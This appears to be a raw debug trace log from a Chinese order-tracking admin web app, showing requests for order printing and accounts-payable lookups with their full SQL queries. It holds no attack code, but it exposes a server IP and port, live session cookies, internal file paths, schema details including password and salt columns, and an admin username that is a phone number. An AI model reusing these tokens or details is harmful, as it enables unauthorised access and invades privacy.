] 47.105.33.115:8081/admin/ordermge/outbound/printout/ids/11836?dialog=1 [运行时间:0.069523s][吞吐率:14.38req/s] [内存消耗:5,981.18kb] [文件加载:90] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001195s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ordermge.outbound', 2 => 'printout', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/ordermge/outbound?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=99f08b9utof4k5kireqhjmee40', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'ids' => '11836', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001469s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ordermge/outbound.php [ info ] [ RUN ] app\admin\controller\ordermge\Outbound->printout[ /alidata/www/gendan/application/admin/controller/ordermge/Outbound.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/ordermge/outbound/printout.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'completeStatusList', 6 => 'isPrintList', 7 => 'id', 8 => 'pages', 9 => 'time', 10 => 'outbound', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000114s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000565s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000730s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='39' and ag.status='normal' ) [ RunTime:0.000417s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000656s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (191,337,233,177,190) [ RunTime:0.000312s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.000785s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000632s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000619s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000590s ] [ sql ] [ SQL ] SELECT `outbound`.`id`,`outbound`.`number`,`outbound`.`kehu_id`,`outbound`.`total_money`,`outbound`.`buildstaff_id`,`outbound`.`staffinfo_id`,`outbound`.`factorymge_id`,`outbound`.`complete_status`,`outbound`.`admin_id`,`outbound`.`is_print`,`outbound`.`createtime`,`outbound`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,staffinfo.id AS staffinfo__id,staffinfo.name AS staffinfo__name,staffinfo.jobmge_id AS staffinfo__jobmge_id,staffinfo.accout_num AS staffinfo__accout_num,staffinfo.phone_num AS staffinfo__phone_num,staffinfo.accout_pwd AS staffinfo__accout_pwd,staffinfo.salt AS staffinfo__salt,staffinfo.staff_status AS staffinfo__staff_status,staffinfo.admin_id AS staffinfo__admin_id,staffinfo.factorymge_id AS staffinfo__factorymge_id,staffinfo.createtime AS staffinfo__createtime,staffinfo.updatetime AS staffinfo__updatetime,staffinfo.portrait AS staffinfo__portrait,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime FROM `ot_outbound` `outbound` LEFT JOIN `ot_factorymge` `factorymge` ON `outbound`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_staffinfo` `staffinfo` ON `outbound`.`staffinfo_id`=`staffinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outbound`.`kehu_id`=`kehu`.`id` WHERE `outbound`.`id` = '11836' LIMIT 1 [ RunTime:0.000532s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.000573s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.000847s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000635s ] [ sql ] [ SQL ] SELECT `outboundandorder`.`id`,`outboundandorder`.`outbound_id`,`outboundandorder`.`orderinfo_id`,`outboundandorder`.`kehu_id`,`outboundandorder`.`amount`,`outboundandorder`.`money`,`outboundandorder`.`price`,`outboundandorder`.`productinfo_id`,`outboundandorder`.`factorymge_id`,`outboundandorder`.`staffinfo_id`,`outboundandorder`.`admin_id`,`outboundandorder`.`createtime`,`outboundandorder`.`updatetime`,`outboundandorder`.`verify_status`,`outboundandorder`.`verify_amount`,orderinfo.id AS orderinfo__id,orderinfo.nei_number AS orderinfo__nei_number,orderinfo.number AS orderinfo__number,orderinfo.pid AS orderinfo__pid,orderinfo.order_company AS orderinfo__order_company,orderinfo.order_connect AS orderinfo__order_connect,orderinfo.order_phone AS orderinfo__order_phone,orderinfo.kehu_id AS orderinfo__kehu_id,orderinfo.price AS orderinfo__price,orderinfo.material_id AS orderinfo__material_id,orderinfo.pProductinfo_id AS orderinfo__pProductinfo_id,orderinfo.productinfo_id AS orderinfo__productinfo_id,orderinfo.order_type AS orderinfo__order_type,orderinfo.order_status AS orderinfo__order_status,orderinfo.all_order_status AS orderinfo__all_order_status,orderinfo.shengchan_status AS orderinfo__shengchan_status,orderinfo.zuixinshuoming AS orderinfo__zuixinshuoming,orderinfo.guzhangshu AS orderinfo__guzhangshu,orderinfo.zuixinguzhang AS orderinfo__zuixinguzhang,orderinfo.techprocess_id AS orderinfo__techprocess_id,orderinfo.actual_amount AS orderinfo__actual_amount,orderinfo.kucun_amount AS orderinfo__kucun_amount,orderinfo.produce_amount AS orderinfo__produce_amount,orderinfo.produced_amount AS orderinfo__produced_amount,orderinfo.waste_amount AS orderinfo__waste_amount,orderinfo.produced_time AS orderinfo__produced_time,orderinfo.send_amount AS orderinfo__send_amount,orderinfo.ruku_posi AS orderinfo__ruku_posi,orderinfo.sent_amount AS orderinfo__sent_amount,orderinfo.out_time AS orderinfo__out_time,orderinfo.build_order_staffid AS orderinfo__build_order_staffid,orderinfo.factorymge_id AS orderinfo__factorymge_id,orderinfo.admin_id AS orderinfo__admin_id,orderinfo.remind_day AS orderinfo__remind_day,orderinfo.build_time AS orderinfo__build_time,orderinfo.end_time AS orderinfo__end_time,orderinfo.responsible_staffinfos AS orderinfo__responsible_staffinfos,orderinfo.responsible_staffinfovars AS orderinfo__responsible_staffinfovars,orderinfo.feedback AS orderinfo__feedback,orderinfo.guoqitime AS orderinfo__guoqitime,orderinfo.guoqi_status AS orderinfo__guoqi_status,orderinfo.put_position AS orderinfo__put_position,orderinfo.createtime AS orderinfo__createtime,orderinfo.updatetime AS orderinfo__updatetime,orderinfo.is_modify AS orderinfo__is_modify,orderinfo.purchaseorder_id AS orderinfo__purchaseorder_id,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,outbound.id AS outbound__id,outbound.number AS outbound__number,outbound.kehu_id AS outbound__kehu_id,outbound.total_money AS outbound__total_money,outbound.buildstaff_id AS outbound__buildstaff_id,outbound.staffinfo_id AS outbound__staffinfo_id,outbound.factorymge_id AS outbound__factorymge_id,outbound.complete_status AS outbound__complete_status,outbound.admin_id AS outbound__admin_id,outbound.is_print AS outbound__is_print,outbound.createtime AS outbound__createtime,outbound.updatetime AS outbound__updatetime FROM `ot_outboundandorder` `outboundandorder` LEFT JOIN `ot_orderinfo` `orderinfo` ON `outboundandorder`.`orderinfo_id`=`orderinfo`.`id` LEFT JOIN `ot_productinfo` `productinfo` ON `outboundandorder`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outboundandorder`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `outboundandorder`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_outbound` `outbound` ON `outboundandorder`.`outbound_id`=`outbound`.`id` WHERE `outbound_id` = 11836 [ RunTime:0.013961s ] --------------------------------------------------------------- [ 2025-12-14T16:38:51+08:00 ] 39.144.91.198 GET /admin/ajax/lang?callback=define&controllername=ordermge.outbound&v=1765701529 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=ordermge.outbound&v=1765701529 [运行时间:0.031691s][吞吐率:31.55req/s] [内存消耗:3,853.08kb] [文件加载:72] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001194s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/ordermge/outbound/printout/ids/11836?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=99f08b9utof4k5kireqhjmee40', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'ordermge.outbound', 'v' => '1765701529', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001464s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ordermge/outbound.php [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000140s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:38:54+08:00 ] 39.144.91.198 POST /admin/ordermge/outbound/changePrintSatus [ info ] 47.105.33.115:8081/admin/ordermge/outbound/changePrintSatus [运行时间:0.051037s][吞吐率:19.59req/s] [内存消耗:4,982.55kb] [文件加载:79] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001076s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ordermge.outbound', 2 => 'changePrintSatus', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '8', 'accept' => '*/*', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/ordermge/outbound/printout/ids/11836?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=99f08b9utof4k5kireqhjmee40', ) [ info ] [ PARAM ] array ( 'id' => '11836', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001477s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ordermge/outbound.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\ordermge\Outbound->changePrintSatus[ /alidata/www/gendan/application/admin/controller/ordermge/Outbound.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.006987s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000518s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.000736s ] [ sql ] [ SQL ] UPDATE `ot_outbound` SET `is_print`=1,`updatetime`=1765701534 WHERE `id` = 11836 [ RunTime:0.006009s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.000858s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"id\":\"11836\"}' , '/admin/ordermge/outbound/changePrintSatus' , 39 , '13633375502' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '39.144.91.198' , 1765701534) [ RunTime:0.005045s ] --------------------------------------------------------------- [ 2025-12-14T16:39:05+08:00 ] 121.40.44.214 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.028862s][吞吐率:34.65req/s] [内存消耗:3,333.93kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001215s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36', 'accept-encoding' => 'gzip, deflate', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'connection' => 'keep-alive', 'accept-language' => 'zh-CN,zh;q=0.8', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001618s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000123s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:42:23+08:00 ] 147.135.213.175 GET /www.clcoa.com [ info ] www.clcoa.com/www.clcoa.com [运行时间:0.019829s][吞吐率:50.43req/s] [内存消耗:2,206.73kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001182s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'www.clcoa.com', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'accept' => 'text/html,text/plain,text/xml,text/*,application/xml,application/xhtml+xml,application/rss+xml,application/atom+xml,application/rdf+xml,application/php,application/x-php,application/x-httpd-php', 'user-agent' => 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)', 'accept-encoding' => 'br,gzip', 'accept-language' => 'en', 'host' => 'www.clcoa.com', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:45:01+08:00 ] 106.112.204.117 GET /admin/financial/accountspayable/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22subject_type%22%3A%220%22%7D&op=%7B%22subject_type%22%3A%22LIKE%22%7D&_=1765701265751 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22subject_type%22%3A%220%22%7D&op=%7B%22subject_type%22%3A%22LIKE%22%7D&_=1765701265751 [运行时间:0.076686s][吞吐率:13.04req/s] [内存消耗:5,713.65kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001117s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'index', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{"subject_type":"0"}', 'op' => '{"subject_type":"LIKE"}', '_' => '1765701265751', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001487s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->index[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000111s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000390s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000741s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000396s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001124s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001018s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000678s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000388s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.000677s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.000582s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_worker` [ RunTime:0.000597s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 1 [ RunTime:0.013053s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 0,10 [ RunTime:0.000958s ] --------------------------------------------------------------- [ 2025-12-14T16:46:08+08:00 ] 106.112.204.117 GET /admin/financial/verifybill?addtabs=1 [ info ] 47.105.33.115:8081/admin/financial/verifybill?addtabs=1 [运行时间:0.050776s][吞吐率:19.69req/s] [内存消耗:5,309.43kb] [文件加载:81] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001164s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill?ref=addtabs', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'addtabs' => '1', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001620s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->index[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/financial/verifybill/index.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'adminid', 6 => 'faccount', 7 => 'shoukuanStatusList', 8 => 'start_time', 9 => 'end_time', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000097s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000582s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000844s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON 